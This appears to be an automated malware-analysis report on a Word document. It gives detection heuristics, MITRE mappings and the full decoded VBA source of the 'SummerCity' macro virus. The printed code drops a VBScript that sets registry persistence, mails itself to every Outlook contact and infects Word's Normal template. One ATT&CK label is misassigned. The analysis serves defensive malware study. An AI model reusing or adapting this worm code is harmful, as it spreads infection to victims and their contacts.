MALICIOUS
496
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1137.001 DLL Search Order Hijacking
The VBA macro within the document utilizes `WScript.Shell` and `Scripting.FileSystemObject` to copy itself as 'Summer.vbs' to the user's startup folder and then creates a registry Run key at 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Summer' to ensure persistence. This behavior is indicative of a trojan designed to maintain a foothold on the system.
Heuristics 12
-
ClamAV: Win.Trojan.SSIWG-5 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.SSIWG-5
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
sStr = sStr + "sHeader = §Private Sub AutoClose()§+vbCRLF+vbCRLF+vbCRLF+§Dim sStr As String§+vbCRLF+vbCRLF+§sStr = §+Chr(34)+Chr(34)+vbCRLF" + vbCrLf sStr = sStr + "sFooter =§Dim sFind As Long§+vbCRLF+vbCRLF+§idx = 1§+vbCRLF+§sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§While sFind§+vbCRLF+§ Mid(sStr, sFind, 1) = Chr(34)§+vbCRLF+§ sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§Wend§+vbCRLF+vbCRLF+§Set fso = CreateObject(§+Chr(34)+§Scripting.FileSystemObject§+Chr(34)+§)§+vbCRLF+§Set Script = fso.CreateTextFile(fso.BuildPath(fso.GetSpecialFolder(0), §+Chr(34)+§export.vbs§+Chr(34)+§), True)§+vbCRLF+§Script.Write s … sStr = sStr + "' Read our code in" + vbCrLf -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
sStr = sStr + "" + vbCrLf sStr = sStr + "CreateObject( §WScript.Shell§ ).RegWrite §HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\§ & §Summer§, CreateObject( §Scripting.FileSystemObject§ ).BuildPath( CreateObject( §Scripting.FileSystemObject§ ).GetSpecialFolder(1), §Summer.vbs§ )" + vbCrLf sStr = sStr + "" + vbCrLf -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
sStr = sStr + "" + vbCrLf sStr = sStr + "CreateObject( §Scripting.FileSystemObject§ ).CopyFile WScript.ScriptFullName, CreateObject( §Scripting.FileSystemObject§ ).BuildPath( CreateObject( §Scripting.FileSystemObject§ ).GetSpecialFolder(1), §Summer.vbs§ )" + vbCrLf sStr = sStr + "" + vbCrLf -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
sStr = sStr + "' Get Word's Normal Template" + vbCrLf sStr = sStr + "Set WordObj = GetObject(§§,§Word.Application§)" + vbCrLf sStr = sStr + "If WordObj = §§ Then Set WordObj = CreateObject(§Word.Application§)" + vbCrLf -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Private Sub AutoClose() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
sStr = sStr + "sHeader = §Private Sub AutoClose()§+vbCRLF+vbCRLF+vbCRLF+§Dim sStr As String§+vbCRLF+vbCRLF+§sStr = §+Chr(34)+Chr(34)+vbCRLF" + vbCrLf sStr = sStr + "sFooter =§Dim sFind As Long§+vbCRLF+vbCRLF+§idx = 1§+vbCRLF+§sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§While sFind§+vbCRLF+§ Mid(sStr, sFind, 1) = Chr(34)§+vbCRLF+§ sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§Wend§+vbCRLF+vbCRLF+§Set fso = CreateObject(§+Chr(34)+§Scripting.FileSystemObject§+Chr(34)+§)§+vbCRLF+§Set Script = fso.CreateTextFile(fso.BuildPath(fso.GetSpecialFolder(0), §+Chr(34)+§export.vbs§+Chr(34)+§), True)§+vbCRLF+§Script.Write s … sStr = sStr + "' Read our code in" + vbCrLf -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LUREDocument tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6754 bytes |
SHA-256: 020feca2cf08f75502b34364e68bd5f6c902f354b9f31e8fc88000f14a87b196 |
|||
|
Detection
ClamAV:
Win.Trojan.SSIWG-5
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SummerCity"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub AutoClose()
Dim sStr As String
sStr = ""
sStr = sStr + "' Summer" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "On Error Resume Next" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "Dim A02" + vbCrLf
sStr = sStr + "Dim A06" + vbCrLf
sStr = sStr + "Dim A07" + vbCrLf
sStr = sStr + "Dim A05" + vbCrLf
sStr = sStr + "Dim A09" + vbCrLf
sStr = sStr + "Dim A10" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "CreateObject( §Scripting.FileSystemObject§ ).CopyFile WScript.ScriptFullName, CreateObject( §Scripting.FileSystemObject§ ).BuildPath( CreateObject( §Scripting.FileSystemObject§ ).GetSpecialFolder(1), §Summer.vbs§ )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "CreateObject( §WScript.Shell§ ).RegWrite §HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\§ & §Summer§, CreateObject( §Scripting.FileSystemObject§ ).BuildPath( CreateObject( §Scripting.FileSystemObject§ ).GetSpecialFolder(1), §Summer.vbs§ )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "A04 = CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "If CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) = §§ Or CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) > 20 Then" + vbCrLf
sStr = sStr + " CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) = 0" + vbCrLf
sStr = sStr + "End If" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "If CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) = 0 Then" + vbCrLf
sStr = sStr + " Set A05 = CreateObject( §Outlook.Application§ )" + vbCrLf
sStr = sStr + " Set A06 = A05.GetNameSpace( §MAPI§ )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + " For Each A07 In A06.AddressLists" + vbCrLf
sStr = sStr + " Set A08 = A05.CreateItem( 0 )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + " For A09 = 1 To A07.AddressEntries.Count" + vbCrLf
sStr = sStr + " Set A10 = A07.AddressEntries( A09 )" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + " If A09 = 1 Then" + vbCrLf
sStr = sStr + " A08.BCC = A10.Address" + vbCrLf
sStr = sStr + " Else" + vbCrLf
sStr = sStr + " A08.BCC = A08.BCC & §; § & A10.Address" + vbCrLf
sStr = sStr + " End If" + vbCrLf
sStr = sStr + " Next" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + " A08.Subject = §Hottest Summer News§" + vbCrLf
sStr = sStr + " A08.Body = §Go to the beach and have fun§" + vbCrLf
sStr = sStr + " A08.Attachments.Add WScript.ScriptFullName" + vbCrLf
sStr = sStr + " A08.DeleteAfterSubmit = True" + vbCrLf
sStr = sStr + " A08.Send" + vbCrLf
sStr = sStr + " Next" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + " CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) = 0" + vbCrLf
sStr = sStr + "End If" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "CreateObject( §WScript.Shell§ ).RegWrite §HKEY_LOCAL_MACHINE\§ & §Summer§, CreateObject( §WScript.Shell§ ).RegRead( §HKEY_LOCAL_MACHINE\§ & §Summer§ ) + 1" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "sHeader = §Private Sub AutoClose()§+vbCRLF+vbCRLF+vbCRLF+§Dim sStr As String§+vbCRLF+vbCRLF+§sStr = §+Chr(34)+Chr(34)+vbCRLF" + vbCrLf
sStr = sStr + "sFooter =§Dim sFind As Long§+vbCRLF+vbCRLF+§idx = 1§+vbCRLF+§sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§While sFind§+vbCRLF+§ Mid(sStr, sFind, 1) = Chr(34)§+vbCRLF+§ sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)§+vbCRLF+§Wend§+vbCRLF+vbCRLF+§Set fso = CreateObject(§+Chr(34)+§Scripting.FileSystemObject§+Chr(34)+§)§+vbCRLF+§Set Script = fso.CreateTextFile(fso.BuildPath(fso.GetSpecialFolder(0), §+Chr(34)+§export.vbs§+Chr(34)+§), True)§+vbCRLF+§Script.Write sStr§+vbCRLF+§Script.Close§+vbCRLF+§winFolder = Environ(§+Chr(34)+§WINDIR§+Chr(34)+§)§+vbCRLF+§'Shell winFolder + §+Chr(34)+§\export.vbs§+Chr(34)+§, 0§+vbCRLF+vbCRLF+§End Sub§+vbCRLF" + vbCrLf
sStr = sStr + "' Read our code in" + vbCrLf
sStr = sStr + "Set fso = CreateObject(§Scripting.FileSystemObject§)" + vbCrLf
sStr = sStr + "Set f = fso.OpenTextFile(Wscript.ScriptFullName, 1)" + vbCrLf
sStr = sStr + "WordVirus = f.Readall()" + vbCrLf
sStr = sStr + "f.Close" + vbCrLf
sStr = sStr + "' Replace any quotes" + vbCrLf
sStr = sStr + "WordVirus = Replace(WordVirus, Chr(34), Chr(167))" + vbCrLf
sStr = sStr + "lines = Split(WordVirus, vbCRLF)" + vbCrLf
sStr = sStr + "For n = 0 to Ubound(lines)" + vbCrLf
sStr = sStr + " lines(n) = §sStr=sStr+§ & Chr(34) & lines(n) & Chr(34) & §+vbCRLF§" + vbCrLf
sStr = sStr + "Next" + vbCrLf
sStr = sStr + "' Get Word's Normal Template" + vbCrLf
sStr = sStr + "Set WordObj = GetObject(§§,§Word.Application§)" + vbCrLf
sStr = sStr + "If WordObj = §§ Then Set WordObj = CreateObject(§Word.Application§)" + vbCrLf
sStr = sStr + "WordObj.Visible = True" + vbCrLf
sStr = sStr + "WordObj.Activate" + vbCrLf
sStr = sStr + "WordObj.Options.SaveNormalPrompt = False" + vbCrLf
sStr = sStr + "Set NTI1 = WordObj.NormalTemplate.VBProject.VBComponents.Item(1)" + vbCrLf
sStr = sStr + "' Infect Normal Template" + vbCrLf
sStr = sStr + "If NTI1.Name <> §SummerCity§ Then" + vbCrLf
sStr = sStr + " NTI1.CodeModule.DeleteLines 1, NTI1.CodeModule.CountOfLines" + vbCrLf
sStr = sStr + " NTI1.CodeModule.InsertLines 1, sFooter" + vbCrLf
sStr = sStr + " NTI1.CodeModule.InsertLines 1, Join(lines, vbCRLF)" + vbCrLf
sStr = sStr + " NTI1.CodeModule.InsertLines 1, sHeader" + vbCrLf
sStr = sStr + " NTI1.Name = §SummerCity§" + vbCrLf
sStr = sStr + "End If" + vbCrLf
sStr = sStr + "' Clean up" + vbCrLf
sStr = sStr + "set NTI1 = Nothing" + vbCrLf
sStr = sStr + "set WordObj = Nothing" + vbCrLf
sStr = sStr + "" + vbCrLf
sStr = sStr + "" + vbCrLf
Dim sFind As Long
idx = 1
sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)
While sFind
Mid(sStr, sFind, 1) = Chr(34)
sFind = InStr(idx, sStr, Chr(167), vbBinaryCompare)
Wend
Set fso = CreateObject("Scripting.FileSystemObject")
Set Script = fso.CreateTextFile(fso.BuildPath(fso.GetSpecialFolder(0), "export.vbs"), True)
Script.Write sStr
Script.Close
winFolder = Environ("WINDIR")
'Shell winFolder + "\export.vbs", 0
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.